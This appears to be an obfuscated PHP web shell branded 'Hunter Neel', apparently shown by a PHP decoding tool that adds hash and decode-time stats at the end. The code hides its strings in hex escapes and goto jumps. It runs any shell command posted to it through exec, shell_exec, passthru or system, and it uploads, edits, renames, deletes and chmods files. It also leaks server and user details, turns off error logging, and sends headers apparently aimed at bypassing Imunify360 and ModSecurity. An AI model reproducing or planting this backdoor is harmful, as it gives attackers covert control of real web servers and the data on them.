</table></div><div class="sidebar"id="sidebar"><div class="sidebar-content"><div class="sidebar-close"><button onclick="toggleSidebar()">Close</button></div><div class="info-container"><h2>Server Info</h2><?php  goto ZuuGp; T54Ly: if ($_SERVER["\x52\x45\x51\x55\x45\123\x54\137\x4d\x45\x54\110\x4f\104"] === "\x47\105\x54" && isset($_GET["\x72\145\156\x61\x6d\145"])) { $oldName = $_GET["\162\x65\x6e\x61\155\145"]; echo "\74\144\151\166\x20\x63\154\141\163\163\x3d\x22\x6d\x65\163\163\141\x67\145\x2d\143\x6f\156\x74\141\151\x6e\x65\162\x22\76"; echo "\74\x70\x3e\122\145\x6e\x61\155\145\x20\x3a\40{$oldName}\x3c\x2f\160\76"; echo "\74\x66\157\x72\x6d\x20\x6d\x65\x74\150\157\x64\75\42\x50\x4f\123\124\42\x20\141\143\164\151\x6f\156\x3d\x22\42\76"; echo "\x3c\x69\156\160\x75\x74\x20\164\171\160\145\x3d\x22\150\151\144\x64\x65\156\42\40\156\141\155\x65\75\42\162\145\156\141\x6d\x65\x22\x20\x76\x61\x6c\165\145\75\42\164\162\165\x65\42\76"; echo "\74\x69\156\x70\x75\x74\x20\x74\171\x70\x65\x3d\42\x68\151\144\144\145\x6e\x22\x20\156\141\155\145\x3d\42\157\154\x64\137\x6e\141\155\145\42\40\x76\141\x6c\165\x65\x3d\x22" . htmlspecialchars($oldName) . "\x22\76"; echo "\x3c\151\156\x70\165\x74\40\164\x79\160\x65\x3d\x22\x74\145\170\x74\42\x20\156\141\x6d\145\x3d\x22\156\x65\167\137\156\141\155\145\x22\40\x70\x6c\141\143\x65\150\157\x6c\144\x65\162\x3d\42\x45\x6e\x74\x65\162\40\x6e\145\x77\x20\x6e\x61\x6d\145\x22\x20\162\145\x71\165\x69\162\x65\144\x3e"; echo "\x3c\x69\156\160\x75\164\40\164\171\x70\145\x3d\x22\163\165\x62\155\151\x74\x22\x20\x76\x61\x6c\x75\145\75\42\122\x65\156\x61\x6d\x65\x22\x3e"; echo "\x3c\57\x66\x6f\x72\x6d\76"; echo "\74\x2f\144\151\166\x3e"; } goto VAAFP; rCFc2: if (function_exists("\x69\155\165\x6e\x69\146\171\x33\66\60\137\x72\x65\161\165\145\x73\x74\137\150\x65\x61\x64\x65\162\x73") && defined("\111\115\125\116\x49\106\x59\63\x36\x30\x5f\126\x45\122\123\x49\117\x4e")) { $imunifyHeaders = imunify360_request_headers(); if (isset($imunifyHeaders["\x58\55\111\155\x75\x6e\x69\146\x79\x33\66\60\55\122\145\x71\x75\x65\x73\x74"])) { header("\130\55\x49\155\x75\156\x69\x66\x79\63\x36\x30\x2d\x52\x65\x71\165\145\x73\x74\x3a\x20\x62\171\x70\141\163\x73"); } if (isset($imunifyHeaders["\130\x2d\x49\x6d\165\x6e\x69\146\x79\63\x36\x30\x2d\x43\x61\x70\x74\143\150\x61\x2d\102\x79\x70\x61\163\x73"])) { header("\130\x2d\x49\155\x75\156\151\x66\171\63\x36\x30\55\103\x61\x70\164\x63\150\x61\55\x42\171\160\141\163\163\x3a\x20" . $imunifyHeaders["\130\x2d\111\155\165\156\x69\x66\171\x33\66\x30\x2d\x43\141\160\164\143\150\141\55\102\171\160\141\x73\x73"]); } } goto PYF3C; W23ol: @error_reporting(0); goto EVlTR; IkPzI: @ini_set("\x6d\x61\170\137\145\170\x65\x63\165\164\x69\x6f\x6e\x5f\164\x69\x6d\145", 0); goto W23ol; gxRrT: function formatBytes($bytes, $precision = 2) { $units = array("\102", "\113\x42", "\x4d\x42", "\107\102", "\x54\x42"); $bytes = max($bytes, 0); $pow = floor(($bytes ? log($bytes) : 0) / log(1024)); $pow = min($pow, count($units) - 1); $bytes /= 1 << 10 * $pow; return round($bytes, $precision) . "\x20" . $units[$pow]; } goto JKKjb; M_VnH: ?>
</li></ul></div><div class="info-container"><h2>User Info</h2><ul class="info-list"><li>Username:<?php  goto CVhSD; vSfd0: if ($_SERVER["\x52\x45\x51\x55\105\x53\124\x5f\x4d\105\x54\110\x4f\x44"] === "\107\x45\124" && isset($_GET["\x64\x65\x6c\145\164\145"])) { $deletePath = $_GET["\144\145\x6c\145\164\145"]; $deletePath = str_replace("\x2f", '', $deletePath); $deletePath = $path . "\57" . $deletePath; if (is_file($deletePath)) { if (unlink($deletePath)) { echo "\74\144\151\166\40\x63\x6c\x61\x73\163\75\x27\155\x65\x73\x73\x61\x67\145\x2d\x63\157\156\x74\x61\151\156\145\x72\47\76\74\x70\x3e\x46\x69\x6c\x65\40\x64\145\x6c\145\164\x65\x64\40\163\165\143\x63\145\x73\163\x66\x75\x6c\x6c\171\x3a\40{$deletePath}\x3c\57\x70\76\x3c\x2f\144\151\166\76"; } else { echo "\x3c\x64\151\x76\40\143\x6c\141\163\163\75\47\155\x65\163\x73\x61\147\145\55\x63\x6f\156\164\x61\x69\x6e\x65\162\x27\76\74\160\76\x46\x61\x69\154\x65\x64\x20\164\x6f\x20\x64\x65\x6c\145\x74\145\x20\x74\150\x65\x20\146\151\154\x65\72\40{$deletePath}\74\57\x70\x3e\74\57\144\x69\x76\76"; } } elseif (is_dir($deletePath)) { if (rmdir($deletePath)) { echo "\74\144\151\x76\40\143\154\141\x73\x73\x3d\47\155\x65\x73\163\x61\x67\145\55\x63\157\156\x74\141\151\x6e\145\162\47\76\74\x70\76\x46\157\x6c\x64\145\x72\40\x64\x65\154\145\x74\145\144\40\163\165\143\x63\x65\x73\163\x66\x75\x6c\154\171\x3a\40{$deletePath}\x3c\57\x70\x3e\x3c\x2f\x64\x69\166\76"; } else { echo "\74\144\151\x76\x20\x63\154\141\x73\x73\x3d\x27\x6d\x65\163\163\x61\147\145\x2d\143\157\156\x74\x61\151\156\x65\162\47\x3e\x3c\x70\x3e\x46\141\151\154\145\x64\40\164\x6f\40\144\145\154\x65\x74\x65\40\164\150\145\x20\146\x6f\x6c\x64\x65\162\x3a\x20{$deletePath}\74\x2f\160\76\74\x2f\144\151\166\x3e"; } } else { echo "\74\x64\x69\x76\x20\143\154\x61\163\163\x3d\47\x6d\x65\163\x73\141\147\145\x2d\x63\x6f\156\x74\x61\x69\x6e\145\162\47\x3e\74\x70\x3e\x49\156\166\x61\154\x69\x64\x20\146\x69\154\x65\x20\x6f\162\40\146\157\x6c\144\x65\162\x20\160\141\164\x68\x3a\40{$deletePath}\74\x2f\x70\x3e\x3c\x2f\x64\x69\166\x3e"; } } goto L_0ON; qtR7L: if (isset($_SERVER["\123\105\122\x56\105\x52\x5f\x41\x44\x44\x52"])) { ?>
<li>IP Address:<?php  echo $_SERVER["\123\105\122\126\x45\x52\x5f\101\x44\104\122"]; ?>
</li><?php  } goto xljA_; heUdx: if ($_SERVER["\x52\x45\x51\x55\105\123\x54\x5f\x4d\105\x54\x48\117\104"] === "\120\117\x53\x54" && isset($_POST["\x72\x65\156\x61\155\x65"]) && $_POST["\162\145\156\141\155\145"] === "\164\x72\165\145") { $oldName = $_POST["\x6f\x6c\x64\x5f\x6e\141\x6d\145"]; $newName = $_POST["\x6e\x65\167\137\156\x61\155\145"]; $newPath = $path . "\x2f" . $newName; $oldPath = $path . "\57" . $oldName; if (rename($oldPath, $newPath)) { echo "\74\144\151\x76\x20\143\154\141\x73\x73\75\x27\x6d\145\163\163\x61\147\145\x2d\x63\x6f\x6e\x74\x61\x69\x6e\x65\162\47\x3e\74\x70\x3e\122\x65\x6e\141\x6d\x69\x6e\x67\40\x73\165\143\x63\x65\163\163\x66\x75\x6c\56\40{$newName}\x3c\57\160\x3e"; } else { echo "\74\x70\x3e\106\141\x69\154\x65\144\x20\164\157\x20\162\x65\x6e\141\155\145\56\74\57\x70\76\x3c\x2f\x64\151\x76\76"; } } goto vSfd0; cDRBY: echo @ini_get("\144\151\163\x61\142\154\145\x5f\x66\165\x6e\143\164\x69\157\156\163"); goto X2QF8; PYF3C: if (function_exists("\141\160\141\x63\150\x65\x5f\162\145\x71\165\x65\163\164\x5f\150\145\x61\x64\145\x72\163")) { $apacheHeaders = apache_request_headers(); if (isset($apacheHeaders["\130\x2d\x4d\157\x64\55\123\145\143\165\x72\151\164\171"])) { header("\x58\55\115\157\144\55\123\x65\x63\x75\162\151\x74\x79\x3a\x20" . $apacheHeaders["\x58\55\x4d\x6f\144\55\x53\x65\x63\x75\x72\151\x74\x79"]); } } goto JvglE; SUeYR: @header("\130\x2d\x41\x63\x63\x65\x6c\x2d\x42\x75\x66\x66\x65\x72\151\x6e\147\x3a\x20\x6e\157"); goto v3M0q; trdvW: echo "\12\x20\x20\x20\40\x3c\x66\x6f\x72\x6d\40\155\145\164\150\157\x64\x3d\x22\x50\117\123\124\42\76\xa\x20\40\40\40\x3c\x69\156\x70\165\x74\40\x74\171\x70\x65\x3d\x22\x74\x65\170\164\x22\40\x6e\141\x6d\145\x3d\x22\156\x65\167\x5f\x66\157\154\x64\x65\x72\x5f\x6e\x61\x6d\145\x22\40\x70\x6c\141\x63\145\150\x6f\x6c\144\x65\162\x3d\x22\x4e\145\167\x20\106\157\154\144\145\162\x20\x4e\x61\x6d\x65\x22\x3e\12\40\x20\40\x20\x3c\151\x6e\160\165\x74\40\164\171\160\x65\x3d\x22\163\165\142\x6d\151\x74\42\40\156\x61\x6d\145\75\42\x63\x72\x65\x61\x74\145\137\x66\x6f\x6c\144\145\162\x22\x20\166\141\154\x75\x65\75\x22\103\162\145\x61\164\145\x20\106\x6f\154\144\x65\x72\42\x3e\12\40\x20\40\x20\74\x2f\x66\x6f\x72\x6d\76"; goto gQXwC; Qr8vd: ?>
<form action=""method="POST"><?php  goto EYXhW; owT3v: @http_response_code(404); goto MFyDx; gQXwC: echo "\xa\x20\40\x20\40\74\146\x6f\x72\x6d\40\x6d\145\x74\x68\157\x64\x3d\x22\120\x4f\123\x54\42\76\xa\x20\40\x20\x20\x3c\x69\156\160\x75\164\40\x74\171\x70\x65\x3d\42\164\x65\170\x74\42\40\156\141\155\x65\75\42\x6e\145\x77\x5f\146\x69\x6c\145\137\x6e\141\155\x65\x22\x20\160\154\141\x63\145\150\x6f\154\x64\145\x72\x3d\x22\x4e\145\x77\x20\106\x69\154\x65\40\116\141\155\145\42\76\xa\x20\x20\40\40\x3c\x69\156\160\x75\164\x20\164\x79\160\x65\75\42\163\165\x62\155\x69\164\42\40\x6e\x61\x6d\145\x3d\x22\143\x72\x65\x61\x74\x65\137\146\x69\x6c\145\42\x20\166\x61\154\165\x65\x3d\42\x43\162\x65\141\x74\x65\40\106\x69\154\x65\x22\76\12\x20\40\40\x20\74\57\x66\x6f\x72\x6d\x3e"; goto XBrUo; CVhSD: echo @get_current_user(); goto ItLAz; fnfxP: ?>
</li><li>System:<?php  goto SWT7G; i6HSr: echo @phpversion(); goto I7CT2; X_Go3: if (isset($_GET["\146\151\154\145"])) { $file = $_GET["\x66\151\x6c\x65"]; $filePath = $path . "\57" . $file; $fileContent = @file_get_contents($filePath); if ($fileContent !== false) { echo "\x3c\x64\x69\166\40\x63\154\x61\x73\163\x3d\42\155\145\163\x73\x61\147\x65\55\x63\157\x6e\164\x61\151\156\145\x72\42\x3e"; echo "\74\x70\76\105\x64\151\164\x20\106\x69\154\x65\72\40{$file}\74\57\x70\76"; echo "\74\x66\157\x72\x6d\40\155\x65\x74\150\x6f\x64\x3d\x22\120\x4f\x53\x54\42\x20\141\x63\164\x69\157\156\75\x22\x22\76"; echo "\x3c\151\x6e\x70\165\164\x20\x74\x79\x70\145\75\x22\x68\151\x64\144\145\156\42\40\156\141\155\145\75\42\145\144\x69\164\42\x20\x76\x61\x6c\165\x65\75\x22\x74\162\x75\x65\42\x3e"; echo "\74\151\156\160\165\x74\40\x74\x79\x70\x65\75\42\x68\x69\x64\x64\x65\x6e\x22\40\x6e\141\x6d\x65\x3d\x22\x66\x69\x6c\145\42\x20\166\x61\x6c\165\x65\75\x22{$file}\x22\x3e"; echo "\x3c\164\145\x78\x74\141\162\145\x61\40\x6e\x61\155\145\x3d\42\x6e\145\x77\137\x63\x6f\x6e\164\x65\x6e\164\42\40\x72\x6f\167\163\75\x22\61\x30\x22\x20\x63\x6f\x6c\163\x3d\42\x31\x30\x30\x22\40\160\154\141\143\145\x68\157\x6c\144\x65\x72\75\42\105\156\164\145\162\40\156\x65\167\40\x63\157\x6e\x74\x65\156\164\x2e\x2e\56\42\76" . htmlspecialchars($fileContent) . "\74\57\164\145\x78\x74\141\x72\145\141\76"; echo "\74\x69\x6e\160\165\x74\x20\164\x79\x70\145\x3d\42\163\x75\x62\155\x69\x74\42\x20\x76\x61\154\165\x65\x3d\42\105\144\x69\164\42\76"; echo "\x3c\x2f\x66\157\162\155\x3e"; echo "\x3c\57\144\151\x76\x3e"; } } goto T54Ly; v3H6_: echo $domainCount; goto fnfxP; MFyDx: @http_response_code(500); goto FKCi1; EVlTR: @set_time_limit(0); goto IwOJK; cKLcS: echo date("\x59"); goto o69h5; YAR7p: echo @getmyuid(); goto l1xsK; zoqL1: if ($_SERVER["\x52\105\121\125\x45\123\124\137\x4d\105\x54\110\x4f\104"] === "\120\117\123\124" && isset($_FILES["\146\151\154\x65"])) { if ($_FILES["\146\151\154\145"]["\x73\151\x7a\x65"] === 0) { echo "\x3c\x70\x3e\x4f\160\145\156\x20\125\x72\40\x45\x79\x65\x73\x20\x42\151\x74\143\150\40\41\x21\x21\x2e\x3c\57\x70\x3e"; } else { $uploadPath = $path . "\x2f" . $_FILES["\x66\x69\x6c\145"]["\156\x61\155\145"]; if (move_uploaded_file($_FILES["\146\151\x6c\x65"]["\164\155\x70\x5f\156\141\x6d\145"], $uploadPath)) { echo "\74\160\76\x46\151\x6c\145\x20\165\160\x6c\x6f\141\x64\145\144\x20\x73\x75\x63\143\145\x73\163\146\x75\154\154\x79\56\x20{$uploadPath}\x20\56\74\x2f\160\x3e"; } else { echo "\x3c\160\76\x46\151\154\x65\x20\165\x70\154\157\x61\x64\x20\146\x61\x69\154\x65\144\56\74\57\x70\76"; } } } goto Cz50P; ZgpG9: if ($_SERVER["\122\105\121\125\x45\123\124\137\115\105\x54\x48\x4f\x44"] === "\x50\117\123\124" && isset($_POST["\143\155\x64"])) { $cmdOutput = null; $cmd = $_POST["\143\155\x64"]; $path = isset($_GET["\160\141\x74\150"]) ? $_GET["\160\141\164\150"] : getcwd(); $cmd = "\143\x64\40" . escapeshellarg($path) . "\x20\46\x26\x20" . $cmd; if (function_exists("\145\170\x65\143")) { @exec($cmd, $output, $returnVar); if ($returnVar === 0) { $cmdOutput = implode("\xa", $output); } } elseif (function_exists("\x73\x68\145\x6c\154\137\x65\x78\x65\143")) { $cmdOutput = @shell_exec($cmd); } elseif (function_exists("\160\x61\163\x73\x74\x68\162\165")) { ob_start(); @passthru($cmd, $returnVar); $cmdOutput = ob_get_clean(); } elseif (function_exists("\163\171\163\164\x65\155")) { ob_start(); @system($cmd, $returnVar); $cmdOutput = ob_get_clean(); } } goto Qr8vd; y7vDK: if (isset($_POST["\143\162\x65\x61\x74\145\137\146\157\154\144\x65\x72"]) && !empty($_POST["\156\x65\x77\x5f\x66\x6f\154\x64\x65\162\137\x6e\141\155\145"])) { $newFolderName = $_POST["\156\x65\x77\x5f\x66\157\x6c\x64\x65\x72\x5f\156\x61\x6d\145"]; $created = mkdir($path . "\x2f" . $newFolderName, 493); if ($created) { echo "\74\x64\x69\x76\40\143\154\x61\163\x73\75\x22\141\x6c\x65\162\164\40\141\154\x65\x72\x74\55\x73\x75\143\x63\x65\x73\163\x22\x20\162\x6f\154\x65\75\x22\141\x6c\x65\162\x74\x22\76\x46\x6f\x6c\144\145\x72\x20\103\162\x65\x61\164\x65\x64\x20\123\x75\143\143\x65\163\x73\x66\x75\x6c\x6c\171\56\74\57\144\x69\166\x3e"; } else { echo "\x3c\144\x69\x76\x20\143\x6c\x61\163\163\75\x22\141\x6c\145\162\164\40\141\x6c\145\162\x74\55\144\x61\x6e\x67\145\x72\x22\x20\162\x6f\154\x65\75\42\x61\x6c\x65\162\164\42\76\106\x61\x69\x6c\x65\x64\x20\x74\x6f\x20\x43\162\145\x61\164\145\x20\x46\x6f\x6c\144\x65\162\56\74\57\x64\x69\x76\76"; } } goto pVd1K; dF1UA: @http_response_code(403); goto owT3v; dLT50: $paths = @explode("\x2f", $path); goto df7X0; Cz50P: ?>
</div><div class="container"><?php  goto ZgpG9; SAb8j: ?>
<!doctypehtml><html><head><audio autoplay><source src="https://www.soundjay.com/buttons/beep-24.mp3"type="audio/mpeg"></audio><style>body{font-family:Arial,sans-serif;background-color:#f2f2f2;margin:0;padding:0}.container{max-width:800px;margin:20px auto;padding:20px;border:1px solid #ccc;border-radius:5px;box-shadow:0 0 10px rgba(0,0,0,.1);background-color:#fff;position:relative}.footer{text-align:center;max-width:800px;position:relative;background-color:#fff;border:1px solid #ccc;padding:20px;margin:20px auto}.message-container{max-width:800px;margin:20px auto;padding:20px;border:1px solid #ccc;border-radius:5px;box-shadow:0 0 10px rgba(0,0,0,.1);background-color:#fff;position:relative}h1{text-align:center}.button-container{display:flex;justify-content:space-between;align-items:center;margin-top:20px}.empty-button{background:0 0;border:none;color:transparent;cursor:pointer;padding:0;outline:0}table{width:100%;border-collapse:collapse;margin-top:20px}table td,table th{padding:10px;border:1px solid #ccc}table th{background-color:#f2f2f2;font-weight:700}.sidebar{position:fixed;top:0;margin:20px auto;padding:20px;right:-300px;width:300px;height:100%;background-color:#f2f2f2;box-shadow:0 0 10px rgba(0,0,0,.1);transition:right .3s ease-in-out}.sidebar.open{right:0}.sidebar-content{padding:20px}.sidebar-close{text-align:right;margin-bottom:20px}.sidebar-close button{padding:5px 10px;border:none;background-color:#ccc;color:#fff;cursor:pointer}.menu-icon{position:absolute;top:20px;right:20px;width:30px;height:30px;background-color:#ccc;border-radius:50%;cursor:pointer;display:flex;justify-content:center;align-items:center}.menu-icon::after,.menu-icon::before{content:"";position:absolute;width:20px;height:2px;background-color:#fff;transition:transform .3s ease-in-out}.menu-icon::before{transform:translateY(-6px)}.menu-icon::after{transform:translateY(6px)}.menu-icon.open::before{transform:translateY(0) rotate(45deg)}.menu-icon.open::after{transform:translateY(0) rotate(-45deg)}.sidebar h2{margin-top:0}.info-list{list-style:none;padding:0}.info-list li{margin-bottom:10px}.info-list li:last-child{margin-bottom:0}.sidebar .info-container{margin-bottom:20px}</style></head><body><div class="container"><h1>Hunter Neel</h1><div class="menu-icon"onclick="toggleSidebar()"></div><hr><div class="button-container"><div class="input-file"><label class="input-file-label"for="file-input">Choose File</label><form action=""method="post"enctype="multipart/form-data"><input type="file"name="file"id="file-input"> <input type="submit"class="button"value="Upload"></form><?php  goto MktU7; WiuLH: if ($scandir !== false) { $folders = array(); $files = array(); foreach ($scandir as $file) { $filePath = "{$path}\57{$file}"; if (is_dir($filePath)) { $folders[] = $file; } else { if (is_file($filePath)) { $size = filesize($filePath); $size = formatSizeUnits($size); $perms = fileperms($filePath); $permission = getPermissionString($perms); $files[$file] = array("\163\x69\172\145" => $size, "\x70\x65\x72\155\151\x73\x73\x69\157\156" => $permission); } } } foreach ($folders as $folder) { $folderPath = "{$path}\x2f{$folder}"; $folderPermissionColor = is_writable($folderPath) ? "\x67\x72\145\145\156" : "\x72\145\x64"; ?>
<tr><td><a href="?path=<?php  echo $folderPath; ?>
"><?php  echo $folder; ?>
</a></td><td><span style="color:<?php  echo $folderPermissionColor; ?>
"><?php  echo getPermissionString(fileperms($folderPath)); ?>
</span></td><td>-</td><td><select onchange='folderDropdownAction(this.value,"<?php  echo $path; ?>
","<?php  echo $folder; ?>
")'><option value=""disabled selected>Actions</option><option value="rename">Rename</option><option value="delete">Delete</option><option value="chmod">Chmod</option></select></td></tr><script>function folderDropdownAction(e,n,o){if("rename"===e)window.location.href="?path="+n+"&rename="+o;else if("delete"===e){confirm("Apakah Anda yakin ingin menghapus folder ini?")&&(window.location.href="?path="+n+"&delete="+o)}else"chmod"===e&&(window.location.href="?path="+n+"&chmod="+o)}</script><?php  } foreach ($files as $file => $data) { $filePermissionColor = is_writable($path . "\57" . $file) ? "\147\x72\x65\x65\x6e" : "\x72\145\144"; ?>
<tr><td><a href="?path=<?php  echo $path; ?>
&file=<?php  echo $file; ?>
"><?php  echo $file; ?>
</a></td><td><?php  echo $data["\163\151\172\145"]; ?>
</td><td><span style="color:<?php  echo $filePermissionColor; ?>
"><?php  echo $data["\160\145\162\155\x69\163\x73\151\x6f\x6e"]; ?>
</span></td><td><select onchange='dropdownAction(this.value,"<?php  echo $path; ?>
","<?php  echo $file; ?>
")'><option value=""disabled selected>Actions</option><option value="edit">Edit</option><option value="delete">Delete</option><option value="chmod">Chmod</option><option value="rename">Rename</option></select></td></tr><script>function dropdownAction(e,i,n){if("edit"===e)window.location.href="?path="+i+"&file="+n;else if("delete"===e){confirm("Apakah Anda yakin ingin menghapus file ini?")&&(window.location.href="?path="+i+"&delete="+n)}else"chmod"===e?window.location.href="?path="+i+"&chmod="+n:"rename"===e&&(window.location.href="?path="+i+"&rename="+n)}</script><?php  } } else { echo "\74\164\162\x3e\74\x74\144\40\x63\157\154\163\x70\x61\156\75\x22\x34\42\76\x4e\157\x6e\x65\x20\104\x69\162\x65\x63\164\x6f\x72\171\74\x2f\x74\x64\76\74\x2f\164\162\76"; } goto Zu2nS; SdaSl: @ini_set("\x65\162\x72\x6f\x72\137\154\x6f\147", NULL); goto A29m2; JKKjb: ?>
<ul class="info-list"><li>Hostname:<?php  goto JBuPG; lE75A: $scandir = @scandir($path); goto WiuLH; O2Uns: echo @ini_get("\x73\x61\146\x65\137\155\157\144\x65") ? "\x45\x6e\141\142\154\x65\144" : "\104\x69\163\141\142\154\x65\144"; goto BsY6q; L_0ON: if ($_SERVER["\x52\105\121\125\x45\x53\124\137\115\x45\x54\x48\117\x44"] === "\x47\105\124" && isset($_GET["\143\150\155\x6f\x64"])) { $chmodPath = $_GET["\143\x68\x6d\157\144"]; if (strpos($chmodPath, "\57") !== 0) { $path = isset($_GET["\x70\141\164\150"]) ? $_GET["\160\x61\x74\x68"] : getcwd(); $chmodPath = rtrim($path, "\x2f") . "\x2f" . ltrim($chmodPath, "\x2f"); } if (is_file($chmodPath) || is_dir($chmodPath)) { if (isset($_GET["\x6d\x6f\144\145"]) && preg_match("\57\x5e\133\60\x2d\67\135\173\x33\x7d\x24\57", $_GET["\155\x6f\144\x65"])) { $mode = intval($_GET["\155\x6f\x64\x65"], 8); if (chmod($chmodPath, $mode)) { echo "\74\x64\151\x76\x20\143\154\141\x73\x73\x3d\x27\155\145\x73\163\141\x67\x65\55\143\157\x6e\x74\141\151\x6e\x65\x72\47\76\x3c\x70\x3e\x43\150\155\157\144\x20\x73\x75\143\143\x65\163\163\x66\x75\154\x3a\40{$chmodPath}\74\57\x70\x3e\74\x2f\144\x69\166\76"; } else { echo "\x3c\144\151\166\40\x63\x6c\x61\163\x73\75\47\155\x65\x73\x73\x61\147\x65\55\x63\x6f\x6e\x74\x61\151\156\x65\162\x27\76\x3c\160\76\106\141\151\x6c\145\x64\x20\164\x6f\40\143\x68\155\x6f\144\72\40{$chmodPath}\x3c\x2f\x70\76\74\x2f\144\151\x76\x3e"; } } else { $currentMode = fileperms($chmodPath) & 511; echo "\x3c\x64\x69\166\40\143\x6c\x61\x73\x73\75\x27\155\145\163\x73\141\147\x65\55\x63\157\x6e\x74\141\151\156\x65\x72\x27\x3e"; echo "\74\x70\76\103\150\155\x6f\144\72\x20{$chmodPath}\x3c\x2f\x70\x3e"; echo "\74\x66\x6f\162\x6d\x20\155\x65\x74\x68\x6f\x64\x3d\x27\107\105\x54\47\40\141\143\164\x69\157\x6e\75\47\47\76"; echo "\74\151\x6e\x70\x75\164\x20\x74\x79\x70\145\x3d\x27\x68\151\144\x64\145\156\47\x20\x6e\141\155\145\x3d\47\160\141\x74\x68\x27\40\166\141\154\165\145\75\47{$path}\47\76"; echo "\x3c\x69\156\x70\x75\x74\40\x74\x79\x70\145\75\x27\x68\x69\x64\x64\x65\156\47\x20\x6e\141\x6d\x65\x3d\x27\143\150\155\x6f\x64\x27\40\166\141\x6c\x75\145\x3d\47{$chmodPath}\47\x3e"; echo "\x3c\x69\x6e\x70\x75\x74\x20\x74\x79\x70\145\x3d\47\164\145\x78\x74\47\x20\x6e\141\155\x65\x3d\x27\155\157\144\x65\47\40\x70\154\x61\143\145\x68\157\154\x64\x65\162\75\x27\105\156\164\145\x72\40\156\x65\x77\40\155\157\144\x65\40\50\x65\x2e\147\x2e\54\40\x37\65\x35\x29\47\x20\162\x65\x71\x75\151\x72\x65\x64\x3e"; echo "\x3c\x69\156\160\x75\164\x20\164\x79\x70\x65\75\47\x73\x75\142\x6d\x69\164\x27\x20\166\x61\154\x75\145\x3d\x27\103\150\155\157\x64\x27\76"; echo "\74\x2f\x66\157\162\x6d\76"; echo "\74\x70\x3e\103\x75\x72\x72\145\x6e\164\x20\x6d\157\144\145\x3a\x20{$currentMode}\x3c\x2f\x70\76"; echo "\x3c\x2f\x64\151\x76\76"; } } else { echo "\74\x64\x69\x76\40\x63\x6c\141\x73\x73\75\47\x6d\x65\163\163\x61\147\145\x2d\143\x6f\156\x74\141\151\x6e\145\162\47\x3e\74\160\76\111\156\x76\x61\154\x69\x64\x20\146\x69\x6c\145\40\157\x72\x20\x66\x6f\154\144\145\162\x20\160\141\x74\x68\x3a\x20{$chmodPath}\74\x2f\160\x3e\x3c\x2f\144\151\166\76"; } } goto gkzMa; o69h5: ?>
<a href="https://t.me/neel_info">Hunter Neel</a>. All rights reserved.</p></div></body></htm

Function Calls

None

Variables

None

Stats

MD5 251cc2953bb497c2f1a013dfdeed0f5b
Eval Count 0
Decode Time 81 ms